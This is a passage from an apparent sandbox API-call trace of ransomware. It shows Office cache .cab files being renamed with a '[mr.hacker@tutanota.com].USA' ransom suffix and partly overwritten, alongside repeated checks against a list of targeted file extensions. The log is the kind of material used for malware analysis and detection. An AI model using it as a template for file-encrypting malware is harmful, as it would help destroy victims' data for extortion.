nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fb70b8*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.661] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fb70b8 | out: hHeap=0x5d0000) returned 1 [0044.661] CloseHandle (hObject=0x1d0) returned 1 [0045.397] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0045.397] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0045.397] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0045.397] lstrlenW (lpString=".doc") returned 4 [0045.398] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0045.398] lstrlenW (lpString=".docx") returned 5 [0045.398] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0045.398] lstrlenW (lpString=".pdf") returned 4 [0045.398] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0045.398] lstrlenW (lpString=".xls") returned 4 [0045.398] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0045.398] lstrlenW (lpString=".xlsx") returned 5 [0045.398] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0045.398] lstrlenW (lpString=".ppt") returned 4 [0045.398] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0045.398] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0045.398] lstrlenW (lpString=".zip") returned 4 [0045.398] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0045.398] lstrlenW (lpString=".rar") returned 4 [0045.398] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0045.398] lstrlenW (lpString=".bz2") returned 4 [0045.398] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0045.398] lstrlenW (lpString=".7z") returned 3 [0045.398] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0045.398] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0045.398] lstrlenW (lpString=".dbf") returned 4 [0045.398] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0045.398] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0045.398] lstrlenW (lpString=".1cd") returned 4 [0045.398] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0045.398] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0045.398] lstrlenW (lpString=".jpg") returned 4 [0045.398] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0045.398] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0045.398] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0045.398] lstrlenW (lpString=".doc") returned 4 [0045.398] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0045.398] lstrlenW (lpString=".docx") returned 5 [0045.399] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0045.399] lstrlenW (lpString=".pdf") returned 4 [0045.399] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0045.399] lstrlenW (lpString=".xls") returned 4 [0045.399] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0045.399] lstrlenW (lpString=".xlsx") returned 5 [0045.399] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0045.399] lstrlenW (lpString=".ppt") returned 4 [0045.399] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0045.399] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0045.399] lstrlenW (lpString=".zip") returned 4 [0045.399] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0045.399] lstrlenW (lpString=".rar") returned 4 [0045.399] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0045.399] lstrlenW (lpString=".bz2") returned 4 [0045.399] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0045.399] lstrlenW (lpString=".7z") returned 3 [0045.399] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0045.399] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0045.399] lstrlenW (lpString=".dbf") returned 4 [0045.399] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0045.399] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0045.399] lstrlenW (lpString=".1cd") returned 4 [0045.399] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0045.399] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0045.399] lstrlenW (lpString=".jpg") returned 4 [0045.399] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0045.399] lstrcmpiW (lpString1=".cab", lpString2=".USA") returned -1 [0045.399] lstrlenW (lpString="VisioLR.cab") returned 11 [0045.399] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0 [0045.400] GetFileSizeEx (in: hFile=0x1d0, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=50823389) returned 1 [0045.400] CloseHandle (hObject=0x1d0) returned 1 [0045.400] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab")) returned 0x2020 [0045.400] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0045.400] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0045.400] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0 [0045.401] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0x0) returned 1 [0045.401] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0045.401] ReadFile (in: hFile=0x1d0, lpBuffer=0x3bc0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3bc0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.663] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x1028049, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0045.663] ReadFile (in: hFile=0x1d0, lpBuffer=0x3c00058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3c00058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.712] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0045.712] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x30380dd, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0045.712] ReadFile (in: hFile=0x1d0, lpBuffer=0x3c40058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3c40058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.729] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.729] WriteFile (in: hFile=0x1d0, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x32bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0045.753] SetEndOfFile (hFile=0x1d0) returned 1 [0045.753] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3fb70b8 [0045.753] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0045.753] WriteFile (in: hFile=0x1d0, lpBuffer=0x3fb70b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fb70b8*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.192] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x1028049, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0046.192] WriteFile (in: hFile=0x1d0, lpBuffer=0x3fb70b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fb70b8*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.202] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x30380dd, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0046.202] WriteFile (in: hFile=0x1d0, lpBuffer=0x3fb70b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fb70b8*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.204] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fb70b8 | out: hHeap=0x5d0000) returned 1 [0046.206] CloseHandle (hObject=0x1d0) returned 1 [0046.206] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0046.206] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0046.206] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0046.206] lstrlenW (lpString=".doc") returned 4 [0046.206] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0046.206] lstrlenW (lpString=".docx") returned 5 [0046.206] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0046.206] lstrlenW (lpString=".pdf") returned 4 [0046.206] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0046.206] lstrlenW (lpString=".xls") returned 4 [0046.206] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0046.206] lstrlenW (lpString=".xlsx") returned 5 [0046.206] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0046.206] lstrlenW (lpString=".ppt") returned 4 [0046.206] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0046.206] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0046.207] lstrlenW (lpString=".zip") returned 4 [0046.207] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0046.207] lstrlenW (lpString=".rar") returned 4 [0046.207] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0046.207] lstrlenW (lpString=".bz2") returned 4 [0046.207] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0046.207] lstrlenW (lpString=".7z") returned 3 [0046.207] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0046.207] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0046.207] lstrlenW (lpString=".dbf") returned 4 [0046.207] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0046.207] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0046.207] lstrlenW (lpString=".1cd") returned 4 [0046.207] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0046.207] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0046.207] lstrlenW (lpString=".jpg") returned 4 [0046.207] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0046.207] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0046.207] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0046.207] lstrlenW (lpString=".doc") returned 4 [0046.207] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0046.207] lstrlenW (lpString=".docx") returned 5 [0046.207] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0046.207] lstrlenW (lpString=".pdf") returned 4 [0046.207] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0046.207] lstrlenW (lpString=".xls") returned 4 [0046.207] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0046.207] lstrlenW (lpString=".xlsx") returned 5 [0046.207] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0046.207] lstrlenW (lpString=".ppt") returned 4 [0046.207] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0046.207] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0046.207] lstrlenW (lpString=".zip") returned 4 [0046.207] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0046.207] lstrlenW (lpString=".rar") returned 4 [0046.207] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0046.208] lstrlenW (lpString=".bz2") returned 4 [0046.208] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0046.208] lstrlenW (lpString=".7z") returned 3 [0046.208] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0046.208] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0046.208] lstrlenW (lpString=".dbf") returned 4 [0046.208] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0046.208] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0046.208] lstrlenW (lpString=".1cd") returned 4 [0046.208] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0046.208] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0046.208] lstrlenW (lpString=".jpg") returned 4 [0046.208] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0046.208] lstrcmpiW (lpString1=".cab", lpString2=".USA") returned -1 [0046.208] lstrlenW (lpString="ProjLR.cab") returned 10 [0046.208] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0046.441] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=8265165) returned 1 [0046.442] CloseHandle (hObject=0x178) returned 1 [0046.442] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab")) returned 0x2020 [0046.442] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0046.444] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0046.452] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0046.452] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0x0) returned 1 [0046.452] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0046.452] ReadFile (in: hFile=0x1fc, lpBuffer=0x3bc0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3bc0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0046.456] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x2a09ef, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0046.456] ReadFile (in: hFile=0x1fc, lpBuffer=0x3c00058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3c00058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0046.459] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0046.459] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x7a1dcd, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0046.459] ReadFile (in: hFile=0x1fc, lpBuffer=0x3c40058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3c40058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0046.474] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0046.474] WriteFile (in: hFile=0x1fc, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xc0100, lpNumberOfBytesWritten=0x32bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfcb0*=0xc0100, lpOverlapped=0x0) returned 1 [0046.700] SetEndOfFile (hFile=0x1fc) returned 1 [0046.700] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3fb70b8 [0046.704] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0046.704] WriteFile (in: hFile=0x1fc, lpBuffer=0x3fb70b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fb70b8*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.706] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x2a09ef, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0046.706] WriteFile (in: hFile=0x1fc, lpBuffer=0x3fb70b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fb70b8*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.708] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x7a1dcd, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0046.708] WriteFile (in: hFile=0x1fc, lpBuffer=0x3fb70b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fb70b8*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.710] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fb70b8 | out: hHeap=0x5d0000) returned 1 [0046.710] CloseHandle (hObject=0x1fc) returned 1 [0046.710] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0046.734] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0046.734] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0046.734] lstrlenW (lpString=".doc") returned 4 [0046.734] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0046.734] lstrlenW (lpString=".docx") returned 5 [0046.734] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0046.734] lstrlenW (lpString=".pdf") returned 4 [0046.734] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0046.734] lstrlenW (lpString=".xls") returned 4 [0046.734] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0046.734] lstrlenW (lpString=".xlsx") returned 5 [0046.734] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0046.734] lstrlenW (lpString=".ppt") returned 4 [0046.735] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0046.735] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0046.735] lstrlenW (lpString=".zip") returned 4 [0046.735] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0046.735] lstrlenW (lpString=".rar") returned 4 [0046.735] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0046.735] lstrlenW (lpString=".bz2") returned 4 [0046.735] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0046.735] lstrlenW (lpString=".7z") returned 3 [0046.735] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0046.735] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0046.735] lstrlenW (lpString=".dbf") returned 4 [0046.735] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0046.735] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0046.735] lstrlenW (lpString=".1cd") returned 4 [0046.735] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0046.735] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0046.735] lstrlenW (lpString=".jpg") returned 4 [0046.735] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0046.735] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0046.735] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0046.735] lstrlenW (lpString=".doc") returned 4 [0046.735] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0046.735] lstrlenW (lpString=".docx") returned 5 [0046.735] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0046.735] lstrlenW (lpString=".pdf") returned 4 [0046.735] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0046.735] lstrlenW (lpString=".xls") returned 4 [0046.735] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0046.735] lstrlenW (lpString=".xlsx") returned 5 [0046.735] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0046.735] lstrlenW (lpString=".ppt") returned 4 [0046.735] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0046.735] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0046.735] lstrlenW (lpString=".zip") returned 4 [0046.735] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0046.736] lstrlenW (lpString=".rar") returned 4 [0046.736] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0046.736] lstrlenW (lpString=".bz2") returned 4 [0046.736] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0046.736] lstrlenW (lpString=".7z") returned 3 [0046.736] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0046.736] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0046.736] lstrlenW (lpString=".dbf") returned 4 [0046.736] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0046.736] lstrlenW (lpString="C:\\MSOCache\\All 